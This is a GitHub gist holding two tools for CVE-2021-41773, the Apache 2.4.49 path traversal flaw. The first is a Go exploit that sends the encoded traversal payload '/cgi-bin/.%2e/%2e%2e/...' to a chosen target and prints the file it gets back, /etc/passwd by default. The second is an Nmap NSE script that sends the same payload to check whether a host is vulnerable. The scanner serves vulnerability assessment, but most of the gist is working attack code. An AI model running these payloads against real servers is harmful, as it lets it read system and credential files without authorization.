Skip to content

Instantly share code, notes, and snippets.

@slayerlab
Last active October 7, 2021 05:01
Show Gist options
  • Save slayerlab/ef70997e34f547a8916a324e7120962b to your computer and use it in GitHub Desktop.
Save slayerlab/ef70997e34f547a8916a324e7120962b to your computer and use it in GitHub Desktop.
A collection to exploit and assess the CVE-2021-41773 vulnerability regardless of your OS.
package main
import (
"fmt"
"flag"
"net/http"
"io/ioutil"
"strings"
"os"
)
func init() {
flag.Usage = func() {
h := []string {
"Usage message:",
"",
"Options:",
" -t, --target http(s)://[target] Request to the target domain",
" -p, --path [path] Command Line to execute remotely",
"",
}
fmt.Fprintf(os.Stderr, strings.Join(h, "\n"))
}
}
func main() {
var target string
flag.StringVar(&target, "target", "", "")
flag.StringVar(&target, "t", "", "")
var path string
flag.StringVar(&path, "path", "/etc/passwd", "")
flag.StringVar(&path, "p", "/etc/passwd", "")
flag.Parse()
if target == "" {
flag.Usage()
os.Exit(1)
}
res, err := http.Get(target+"/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/"+path)
if err != nil {
fmt.Println("[!] error: http.Get(target)")
}
defer res.Body.Close()
req, err := ioutil.ReadAll(res.Body)
if err != nil {
fmt.Println("[!] error: ioutil.ReadAll(resp.Body)")
}
fmt.Println(string(req))
}
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local table = require "table"
local string = require "string"
local vulns = require "vulns"
description = [[
This NSE script identifies whether specified web domain is VULNERABLE
to the Apache 2.4.49 Path Traversal (CVE-2021-41773).
]]
---
-- @usage
-- nmap --script http-vuln-cve2021-41773 --script-args http.useragent="[user-agent]" <target>
-- nmap --script http-vuln-cve2021-41773 --script-args payload="/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/" <target>
-- nmap --script http-vuln-cve2021-41773 --script-args path="/etc/passwd" <target>
--
-- @output
-- PORT STATE SERVICE REASON
-- 80/tcp open http syn-ack
-- | http-vuln-cve2021-41773:
-- | VULNERABLE:
-- | Apache 2.4.49 Path Traversal Vulnerability
-- | State: VULNERABLE
-- | IDs: 1:CVE-2021-41773
-- | The Apache HTTP Server 2.4.49 has a path traversal vulnerability which
-- | an attacker can map URLs to files outside the expected document root.
-- |
-- | If files outside of the document root are not protected by
-- | "Require all denied" policy, these requests can succeed.
-- |
-- | Additionally, this vulnerability could leak the interpreted source
-- | like CGI and PHP scripts. This issue only affects Apache 2.4.49
-- | and not earlier versions. (Fixed on Apache httpd 2.4.50)
-- |
-- | Disclosure date: 2021-10-05
-- | References:
-- |_ https://nvd.nist.gov/vuln/detail/CVE-2021-41773
---
author = "Leonardo Sena (slayer.blog)"
license = "WTFPL"
categories = {"default", "discovery", "safe", "vuln", "exploit"}
portrule = shortport.http
action = function(host, port)
local vuln = {
title = "Apache 2.4.49 Path Traversal Vulnerability",
state = vulns.STATE.NOT_VULN,
description = [[
The Apache HTTP Server 2.4.49 has a path traversal vulnerability which
an attacker can map URLs to files outside the expected document root.
If files outside of the document root are not protected by
"Require all denied" policy, these requests can succeed.
Additionally, this vulnerability could leak the interpreted source
like CGI and PHP scripts. This issue only affects Apache 2.4.49
and not earlier versions. (Fixed on Apache httpd 2.4.50)
]],
IDS = { 'CVE-2021-41773' },
references = { 'https://nvd.nist.gov/vuln/detail/CVE-2021-41773' },
dates = {
disclosure = { year='2021', month='10', day='05' }
}
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "GET"
local payload = stdnse.get_script_args(SCRIPT_NAME..".payload") or "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/"
local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/etc/passwd"
local response = http.generic_request(host, port, method, payload..path)
local notvuln = {}
notvuln['name'] = "CVE-2021-41773"
if response and response.status == 200 then
vuln.state = vulns.STATE.VULN
return vuln_report:make_output(vuln)
elseif response and response.status ~= 200 then
table.insert(notvuln, "NOT VULNERABLE")
return stdnse.format_output(true, notvuln)
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment